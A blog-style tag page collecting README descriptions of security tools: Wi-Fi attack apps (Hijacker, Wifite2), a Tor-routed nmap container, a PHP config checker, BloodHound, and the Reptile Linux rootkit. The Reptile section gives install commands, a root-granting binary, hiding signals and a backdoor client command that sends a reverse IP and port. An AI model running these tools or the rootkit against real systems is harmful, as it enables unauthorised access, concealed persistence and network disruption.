Termux ID: Hidden -->

    Social Items

Home / Hidden

Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.
This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.
The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included.
Root is also necessary, as these tools need root to work.

Features

Information Gathering
  • View a list of access points and stations (clients) around you (even hidden ones)
  • View the activity of a specific network (by measuring beacons and data packets) and its clients
  • Statistics about access points and stations
  • See the manufacturer of a device (AP or station) from the OUI database
  • See the signal power of devices and filter the ones that are closer to you
  • Save captured packets in .cap file

Attacks
  • Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
  • Deauthenticate a specific client from the network it's connected
  • MDK3 Beacon Flooding with custom options and SSID list
  • MDK3 Authentication DoS for a specific network or to everyone
  • Capture a WPA handshake or gather IVs to crack a WEP network
  • Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

Other
  • Leave the app running in the background, optionally with a notification
  • Copy commands or MAC addresses to clipboard
  • Includes the required tools, no need for manual installation
  • Includes the nexmon driver and management utility for BCM4339 devices
  • Set commands to enable and disable monitor mode automatically
  • Crack .cap files with a custom wordlist
  • Create custom actions and run them on an access point or a client easily
  • Sort and filter Access Points with many parameters
  • Export all the gathered information to a file
  • Add an alias to a device (by MAC) for easier identification

Screenshots


Installation
Make sure:
  • you are on Android 5+
  • you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU)
  • have a firmware to support Monitor Mode on your wireless interface

Download the latest version here.
When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode.

Troubleshooting
This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need.
In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings.
If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity.
Please do not report bugs for devices that are not supported or when you are using an outdated version.
Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.

Warning

Legal
It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to. Using a software that uses a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untracable. I am not responsible for how you use this application and any damages you may cause.

Device
The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software.

Hijacker v1.4 - All-in-One Wi-Fi Cracking Tools for Android


Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses.

Example:
$ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:443  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:80  ...  OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.7s latency).

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds

How it works:
When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.

Arguments:
By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).
For example, this:
docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
will be executed as:
proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion
In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:
docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion
will be executed as:
proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion
and
docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion
will be executed as:
proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion
If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.:
docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion

Environment variables:
There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example:
$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:443  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:80  ...  OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds


docker-onion-nmap - Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container


Check current PHP configuration for potential security flaws.
Simply access this file from your webserver or run on CLI.

Author
This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks.

Idea
  • one single file for easy distribution
  • simple tests for each security related ini entry
  • a few other tests - not too complicated though
  • compatible with PHP >= 5.4, or if possible >= 5.0
  • NO complicated/overengineered code, e.g. no classes/interfaces, test-frameworks, libraries, ... -> It is supposed to be obvious on first glance - even for novices - how this tool works and what it does!
  • NO (or very few) dependencies

Usage / Installation
  • CLI: Simply call php phpconfigcheck.php. That's it. Add -a to see hidden results as well, -h for HTML output and -j for JSON output.
  • WEB: Copy this script to any directory accessible by your webserver, e.g. your document root. See also 'Safeguards' below.
    The output in non-CLI mode is HTML by default. This behaviour can be changed by setting the environment variable PCC_OUTPUT_TYPE=text or PCC_OUTPUT_TYPE=json.
    Some test cases are hidden by default, specifically skipped, ok and unknown/untested. To show all results, use phpconfigcheck.php?showall=1. This does not apply to JSON output, which returns all results by default.
    To control the output format in WEB mode use phpconfigcheck.php?format=..., where the value of format maybe one of text, html or json. For example: phpconfigcheck.php?format=text. The format parameter takes precedence over PCC_OUTPUT_TYPE.

Safeguards
Most of the time it is a good idea to keep security related issues such as your PHP configuration to yourself. The following safeguards have been implemented:
  • mtime check: This script stops working in non-CLI mode after two days. Re-arming the check can be done by touch phpconfigcheck.php or by copying the script to your server again (e.g. via SCP). This check can be disabled by setting the environment variable: PCC_DISABLE_MTIME=1, e.g. SetEnv PCC_DISABLE_MTIME 1 in apache's .htaccess.
  • source IP check: By default only localhost (127.0.0.1 and ::1) can access this script. Other hosts may be added by setting PCC_ALLOW_IP to a your IP address or a wildcard pattern, e.g. SetEnv PCC_ALLOW_IP 10.0.0.* in .htaccess. You may also choose to access your webserver via SSH Port forwarding, e.g. ssh -D or ssh -L.

Troubleshooting
  • disabled functions: This scripts needs a few functions to work properly, such as ini_get() and stat(). If one of these functions is blacklisted (or not whitelisted) then execution will fail or produce invalid output. In these cases it is possible to temporarily put Suhosin in simulation mode and omit disable_functions. To be on the safe side, relaxed security configuration can be done with .htaccess in a separate directory. Also, this script may be called from command line with your webserver's configuration, e.g. php -n -c /etc/.../php.ini phpconfigcheck.php.
  • CLI: Older PHP versions don't known about SAPI name 'cli' and use CGI style output even on cli. Workaround: PCC_OUTPUT_TYPE=text /opt/php/php-5.1.6/bin/php phpconfigcheck.php

WARNING
This tool will only support you setting up a secure PHP environment. Nothing else. Your setup, software or any related configuration may still be vulnerable, even if this tool's output suggests otherwise.


pcc - PHP Secure Configuration Checker


Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes.

Features
  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Boot persistence
  • Heaven's door - A ICMP/UDP port-knocking backdoor
  • Client to knock on heaven's door :D

Install
apt-get install linux-headers-$(uname -r)
https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install

Usage
Binaries will be copied to /reptile folder, that will be hidden by Reptile.

Getting root privileges
hax@Debian:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
hax@Debian:~$ /reptile/r00t
You got super powers!

root@Debian:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)

Hiding
  • Hide/unhide reptile module: kill -50 0
  • Hide/unhide process: kill -49 <PID>
  • Hide files contents: all content between the tags will be hidden
Example:
#<reptile> 
content to hide 
#</reptile>

Knocking on heaven's door
Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:
Knock Knock on Heaven's Door
Writen by: F0rb1dd3n

Usage: ./knock_on_heaven <args>

-x      protocol (ICMP/UDP)
-s      Source IP address (You can spoof)
-t      Target IP address
-p      Source Port
-q      Target Port
-d      Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"
-l      Launch listener

[!] ICMP doesn't need ports

ICMP: ./knock_on_heaven -x icmp -s 192.168.0.2 -t 192.168.0.3 -d "F0rb1dd3n 192.168.0.4 4444" -l
UDP:  ./knock_on_heaven -x udp  -s 192.168.0.2 -t 192.168.0.3 -p 53 -q 53 -d "F0rb1dd3n 192.168.0.4 4444" -l

Disclaimer
Some functions of this module is based on another rootkits. Please see the references!

References

Reptile - LKM Linux Rootkit

A complete re-write of wifite, a Python script for auditing wireless networks.

What's new?
  • Lots of files instead of "one big script".
  • Cleaner process management -- No longer leaves processes running in the background.
  • UX: Target access points are refreshed every second instead of every 5 seconds.
  • UX: Displays realtime Power level (in db) of currently-attacked target

What's not new?
  • Backwards compatibility with the original wifite's arguments.
  • Same text-based interface everyone knows and loves.

Full Feature List
  • Reaver Pixie-Dust attack (--pixie)
  • Reaver WPS PIN attack (--reaver)
  • WPA handshake capture (--no-reaver)
  • Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng
  • Various WEP attacks (replay, chopchop, fragment, etc)
  • 5Ghz support for wireless cards that support 5ghz (use -5 option)
  • Stores cracked passwords and handshakes to the current directory, with metadata about the access point (via --cracked command).
  • Decloaks hidden access points when channel is fixed (use -c <channel> option)
  • Provides commands to crack captured WPA handshakes (via --crack command)

Support
Wifite2 is designed entirely for the latest version of Kali Rolling release (tested on Kali 2016.2, updated May 2017).
This means only the latest versions of these programs are supported: Aircrack-ng suite, wash, reaver, tshark, cowpatty.
Other pen-testing distributions (such as BackBox) have outdated versions of these suites; these distributions are not supported.

Installing & Running
git clone https://github.com/derv82/wifite2.git
cd wifite2
./Wifite.py

Screenshots

Decloaking & cracking a hidden access point (via the WPA Handshake attack):


Cracking a weak WEP password (using the WEP Replay attack):


Various cracking options (using --crack option):



Wifite 2 - A complete re-write of Wifite (Automated Wireless Attack Tool)


BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attacks can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.

BloodHound is developed by @_wald0, @CptJesus, and @harmj0y.

Getting started

Getting started with BloodHound is very simple. Once complete, head over to the Data Collection section to start collecting data, or check out the included database using BloodHound.

Windows
  1. Download and install neo4j community edition.
    Optional: configure the REST API to accept remote connections if you plan to run neo4j and the PowerShell ingestor on different hosts.
  2. Clone the BloodHound GitHub repo.
    git clone https://github.com/adaptivethreat/Bloodhound

  3. Start the neo4j server, pointing neo4j to the provided sample graph database.
  4. Run BloodHound.exe from the release found here or build BloodHound from source.
  5. Authenticate to the provided sample graph database at bolt://localhost:7687. The username is "neo4j", and the password is "BloodHound".
You're now ready to get started with data collection!

Linux
  1. Download and install neo4j community edition.
    Optional: configure the REST API to accept remote connections if you plan to run neo4j and the PowerShell ingestor on different hosts.
  2. Clone the BloodHound GitHub repo.
    git clone https://github.com/adaptivethreat/Bloodhound

  3. Start the neo4j server, pointing neo4j to the provided sample graph database.
  4. Run BloodHound from the release found here or build BloodHound from source.
    ./BloodHound

  5. Authenticate to the provided sample graph database at bolt://localhost:7687. The username is "neo4j", and the password is "BloodHound".
You're now ready to get started with data collection!

OSX
  1. Download and install neo4j community edition.
    Optional: configure the REST API to accept remote connections if you plan to run neo4j and the PowerShell ingestor on different hosts.
  2. Clone the BloodHound GitHub repo.
    git clone https://github.com/adaptivethreat/Bloodhound

  3. Start the neo4j server, pointing neo4j to the provided sample graph database.
  4. Run the BloodHound App from the release found here or build BloodHound from source.
  5. Authenticate to the provided sample graph database at bolt://localhost:7687. The username is "neo4j", and the password is "BloodHound".
You're now ready to get started with data collection!

BloodHound - Six Degrees of Domain Admin

Subscribe to: Posts (Atom)